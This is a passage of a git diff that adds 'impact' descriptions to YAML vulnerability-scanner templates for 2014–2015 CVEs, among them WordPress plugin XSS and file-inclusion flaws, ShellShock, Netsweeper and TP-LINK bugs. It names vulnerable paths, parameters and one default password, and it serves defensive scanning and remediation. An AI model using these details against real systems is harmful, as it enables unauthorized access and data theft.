HTML via crafted shortcode parameters, leading to potential session hijacking, defacement of web pages, or theft of sensitive information. remediation: | Update to the latest version of the Shortcode Ninja plugin (1.4 or higher) to fix the XSS vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 41fdb0aff0..8d9194ad25 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to WooCommerce Swipe plugin version 2.7.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index f7e87c7031..7bcbba586f 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the plugin's output, potentially leading to the execution of arbitrary code or stealing sensitive information. remediation: | Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 1840287d97..4edb95c6ac 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index f668c8fa04..c9ef1ee772 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + impact: | + An attacker can gain sensitive information from the target system. remediation: | Upgrade to WordPress EasyCart version 2.0.6 or later. reference: diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index b9393b690a..1a47626018 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Apply the latest patches and updates provided by the vendor to fix the local file inclusion vulnerability in Fonality trixbox. reference: diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 34b7f96890..bb0ef436f0 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a patched version of webEdition or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 7940e9db3d..7d2b20c757 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Update to the latest version of the WP Content Source Control plugin to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 6221e4c4db..4288ed7ec1 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -5,6 +5,8 @@ info: author: pentest_swissky,0xelkomy severity: critical description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock. + impact: | + Remote code execution can lead to unauthorized access, data theft, and system compromise. remediation: | Apply the necessary patches and updates provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index b3cf6ac4ce..19f9b82cf7 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 18c686dbd4..9e78c8a714 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade to a patched version of Osclass (3.4.2 or later) to mitigate the vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 5d4f4c111a..bf91ea2b47 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index be78e830b2..1752fff3a9 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK,daffainfo severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches and updates provided by the Gogs project to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 54d4b7f104..efe5785054 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the server. remediation: | Update to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 6199cfa084..199b65efe7 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 961d60cf26..1acdcfc5d6 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. + impact: | + Allows an attacker to read arbitrary files on the server. remediation: | Update WordPress DB Backup plugin to version 4.6 or higher. reference: diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 9dc8fc2c8f..13395d8a96 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability. + impact: | + Allows remote attackers to inject arbitrary web script or HTML via a crafted file name, leading to potential session hijacking, defacement, or data theft. remediation: | Update to the latest version of the Frontend Uploader plugin (0.9.2) or apply the vendor-supplied patch to fix the vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index d160d3aa60..b308aa0b47 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index dd8558cb5d..38157518a4 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 8c996fff52..c5d2e058ec 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index fd452bcc1c..1068403102 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + impact: | + An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 0d67065af3..58467ad6c8 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. + impact: | + An attacker can gain unauthorized access to the Netsweeper 4.0.5 system using the default weak account. remediation: | Change the default credentials to strong and unique ones. reference: diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 642c6bb209..dcf3b42a41 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index b55457effa..14495e9a1c 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware. remediation: | Apply the latest security patches or updates provided by the vendor to fix the open redirection vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 5e985faeaa..8a00c665d6 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Netsweeper. reference: diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 7cffd109d6..4d6671086c 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the router. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index d4c3cf6cf2..3a6dedf76c 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Update to the latest version of the plugin. reference: diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 61b0e64116..c3a61aca98 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Update to the latest version of the WordPress Simple Image Manipulator plugin. reference: diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index efe1e33d5d..24aff99209 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the server. remediation: | Update to the latest version of the MyPixs plugin (>=0.4) or apply the vendor-provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index d399110245..8941d687b4 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by ElasticSearch to fix the deserialization vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index b380e3ac89..f81971f461 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade IceWarp Mail Server to version 11.1.1 or above to mitigate the directory traversal vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 7ff4adfddd..7df8d394e5 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734. + impact: | + An attacker can read arbitrary files on the server, potentially exposing sensitive information. remediation: | Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 7f01c95b62..652e36911c 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 2af232eb45..5946ef6932 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Apply the latest security patches and updates provided by Magento. reference: diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 706a718ccd..10874acdd6 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected Magento server. remediation: | Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module. reference: diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index eadcb4dc26..44f8f0e842 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the Ericsson Drutt MSDP application. reference: diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 19ac1c3385..ea8c217a9f 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or complete compromise of the WordPress site. remediation: Fixed in version 1.4.14. reference: - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index d95d57a549..eacb800b92 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 86268aad8b..c86c8c0d21 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a version higher than 0.1.1 that includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 9e3ac2d7fe..f53b832ef6 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 895672cc94..4b09b93911 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. + impact: | + An attacker can read sensitive files on the TP-LINK router, potentially leading to unauthorized access or disclosure of sensitive information. remediation: | Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index c749df2ac1..98af5580fa 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. + impact: | + Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system. remediation: | Upgrade to a patched version of Ruby on Rails or disable the Web Console feature. reference: diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index fbb582185f..9dc67fbb4d 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade to a patched version of Elasticsearch or apply the necessary security patches. reference: diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index e83a389cf0..8d1d9a8211 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade to the latest version of ResourceSpace to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 757fd29613..3e65bdf116 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -5,6 